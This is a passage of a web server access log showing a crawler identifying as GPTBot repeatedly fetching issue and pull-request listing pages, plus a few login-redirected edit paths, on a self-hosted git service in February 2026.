"https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:12:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:19:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:19:12:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:19:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:19:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11273] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:19:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11272] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:19:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 